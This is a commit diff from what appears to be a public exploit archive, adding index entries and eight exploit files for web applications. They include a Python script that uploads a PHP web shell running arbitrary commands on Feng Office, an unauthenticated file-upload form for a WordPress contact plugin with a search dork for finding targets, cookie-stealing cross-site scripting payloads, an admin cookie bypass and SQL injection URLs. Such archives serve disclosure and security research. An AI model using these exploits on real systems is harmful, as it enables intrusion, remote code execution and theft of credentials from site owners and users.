Updated 10_25_2014

2014-10-25 04:45:12 +00:00 · 2014-10-25 04:45:12 +00:00 · 2dfafcbe5d
commit 2dfafcbe5d
parent b7c11b0dcd
9 changed files with 154 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -31447,6 +31447,7 @@ id,file,description,date,author,platform,type,port
 34918,platforms/cgi/webapps/34918.txt,"Ultra Electronics 7.2.0.19 and 7.4.0.7 - Multiple Vulnerabilities",2014-10-06,"OSI Security",cgi,webapps,443
 34919,platforms/php/webapps/34919.txt,"SkyBlueCanvas 1.1 r237 'admin.php' Directory Traversal Vulnerability",2009-07-16,MaXe,php,webapps,0
 34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0
+34922,platforms/php/webapps/34922.txt,"Creative Contact Form - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
 34923,platforms/linux/local/34923.c,"Linux Kernel  3.16.1 - Remount FUSE Exploit",2014-10-09,"Andy Lutomirski",linux,local,0
 34924,platforms/windows/webapps/34924.txt,"BMC Track-It! - Multiple Vulnerabilities",2014-10-09,"Pedro Ribeiro",windows,webapps,0
 34925,platforms/php/remote/34925.rb,"Wordpress InfusionSoft Plugin Upload Vulnerability",2014-10-09,metasploit,php,remote,80
@ -31554,3 +31555,10 @@ id,file,description,date,author,platform,type,port
 35038,platforms/ios/webapps/35038.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-22,Vulnerability-Lab,ios,webapps,80
 35039,platforms/windows/webapps/35039.rb,"DotNetNuke DNNspot Store 3.0.0 Arbitary File Upload",2014-10-22,"Glafkos Charalambous ",windows,webapps,0
 35040,platforms/windows/local/35040.txt,"iBackup 10.0.0.32 - Local Privilege Escalation",2014-10-22,"Glafkos Charalambous ",windows,local,0
+35041,platforms/php/webapps/35041.py,"Feng Office 1.7.4 - Arbitrary File Upload",2014-10-23,"AutoSec Tools",php,webapps,0
+35042,platforms/php/webapps/35042.txt,"Feng Office 1.7.4 - Cross Site Scripting Vulnerabilities",2014-10-23,"AutoSec Tools",php,webapps,0
+35043,platforms/php/webapps/35043.txt,"Contenido CMS 4.8.12 Multiple Cross Site Scripting Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0
+35044,platforms/php/webapps/35044.txt,"Alguest 1.1 Multiple Cookie Authentication Bypass Vulnerabilities",2010-12-03,"Aliaksandr Hartsuyeu",php,webapps,0
+35045,platforms/asp/webapps/35045.txt,"DotNetNuke 5.5.1 'InstallWizard.aspx' Cross Site Scripting Vulnerability",2010-12-03,"Richard Brain",asp,webapps,0
+35048,platforms/asp/webapps/35048.txt,"Techno Dreams Articles & Papers Package 2.0 'ArticlesTablelist.asp' SQL Injection Vulnerability",2010-12-04,R4dc0re,asp,webapps,0
+35049,platforms/asp/webapps/35049.txt,"Techno Dreams FAQ Manager Package 1.0 'faqlist.asp' SQL Injection Vulnerability",2010-12-04,R4dc0re,asp,webapps,0
--- a/platforms/asp/webapps/35045.txt
+++ b/platforms/asp/webapps/35045.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45180/info
+
+DotNetNuke is prone to a cross-site-scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+DotNetNuke 5.5.1 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/Install/InstallWizard.aspx?__VIEWSTATE=<script>alert(1)</script>
--- a/platforms/asp/webapps/35048.txt
+++ b/platforms/asp/webapps/35048.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45201/info
+
+Techno Dreams Articles & Papers Package is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Techno Dreams Articles & Papers Package 2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/papers/ArticlesTablelist.asp?order=[Code] 
--- a/platforms/asp/webapps/35049.txt
+++ b/platforms/asp/webapps/35049.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45202/info
+
+Techno Dreams FAQ Manager Package is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Techno Dreams FAQ Manager Package 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/FAQ/faqlist.asp?order=[Code] 
--- a/platforms/php/webapps/34922.txt
+++ b/platforms/php/webapps/34922.txt
@ -0,0 +1,37 @@
+==========================================================
+"Creative Contact Form - The Best WordPress Contact Form Builder" -
+Arbitrary File Upload
+
+# Author: Gianni Angelozzi
+# Date: 08/10/2014
+# Remote: Yes
+# Vendor Homepage: https://profiles.wordpress.org/creative-solutions-1/
+# Software Link: https://wordpress.org/plugins/sexy-contact-form/
+# CVE: CVE-2014-7969
+# Version: all including latest 0.9.7
+# Google Dork: inurl:"wp-content/plugins/sexy-contact-form"
+
+This plugin includes a PHP script to accept file uploads that doesn't
+perform any security check, thus allowing unauthenticated remote file
+upload, leading to remote code execution. All versions are affected.
+Uploaded files are stored with their original file name.
+==========================================================
+PoC
+==========================================================
+Trigger a file upload
+
+<form method="POST" action="
+http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php"
+enctype="multipart/form-data">
+<input type="file" name="files[]" /><button>Upload</button>
+</form>
+Then the file is accessible under
+
+http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/files/FILENAME
+==========================================================
+EOF
+
+
+Thanks,
+
+Gianni Angelozzi
--- a/platforms/php/webapps/35041.py
+++ b/platforms/php/webapps/35041.py
@ -0,0 +1,43 @@
+import socket
+
+host = 'localhost'
+path = '/feng_community'
+shell_path = '/tmp'
+port = 80
+
+def upload_shell():
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((host, port))
+    s.settimeout(8)    
+
+    s.send('POST ' + path + '/public/assets/javascript/ckeditor/ck_upload_handler.php HTTP/1.1\r\n'
+           'Host: localhost\r\n'
+           'Proxy-Connection: keep-alive\r\n'
+           'User-Agent: x\r\n'
+           'Content-Length: 195\r\n'
+           'Cache-Control: max-age=0\r\n'
+           'Origin: null\r\n'
+           'Content-Type: multipart/form-data; boundary=----x\r\n'
+           'Accept: text/html\r\n'
+           'Accept-Encoding: gzip,deflate,sdch\r\n'
+           'Accept-Language: en-US,en;q=0.8\r\n'
+           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
+           '\r\n'
+           '------x\r\n'
+           'Content-Disposition: form-data; name="shell_file"; filename="shell.php"\r\n'
+           'Content-Type: application/octet-stream\r\n'
+           '\r\n'
+           '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
+           '------x--\r\n'
+           '\r\n')
+
+    resp = s.recv(8192)
+
+    http_ok = 'HTTP/1.1 200 OK'
+    
+    if http_ok not in resp[:len(http_ok)]:
+        print 'error uploading shell'
+        return
+    else: print 'shell uploaded to http://' + host + path + shell_path
+
+upload_shell()
--- a/platforms/php/webapps/35042.txt
+++ b/platforms/php/webapps/35042.txt
@ -0,0 +1,10 @@
+Source: http://www.securityfocus.com/bid/47049/info
+
+<html> 
+<body onload="document.forms[0].submit()"> 
+<form method="POST" action="http://localhost/feng_community/public/assets/javascript/slimey/save.php"> 
+<input type="hidden" name="filename" value=""><script>alert(0)</script>" /> 
+<input type="hidden" name="slimContent" value="&lt;/textarea&gt;<script>alert(0)</script>" /> 
+</form> 
+</body> 
+</html>
--- a/platforms/php/webapps/35043.txt
+++ b/platforms/php/webapps/35043.txt
@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/45160/info
+
+Contenido CMS is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Contenido CMS 4.8.12 is vulnerable; other versions may also be affected. 
+
+<form action=http://www.example.com/path/to/contact/form.html?parentid= methos=POST name=M>
+<input type="hidden" name="send" valuye="1">
+<input type="hidden" name="Vorname" valuye=&#039;z"><script>alert(document.cookie)</script>&#039;>
+</form>
+<script>
+document.M.Submit();
+<script>
+
+
+http://www.example.com/en/front_content.php?idart=1267%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
--- a/platforms/php/webapps/35044.txt
+++ b/platforms/php/webapps/35044.txt
@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/45175/info
+
+Alguest is prone to multiple authentication-bypass vulnerabilities.
+
+Attackers can exploit this issue to gain administrative control of the affected application.
+
+Alguest 1.1c-patched is vulnerable; other versions may also be affected. 
+
+The following example input is available:
+
+Cookie: admin=anyvalue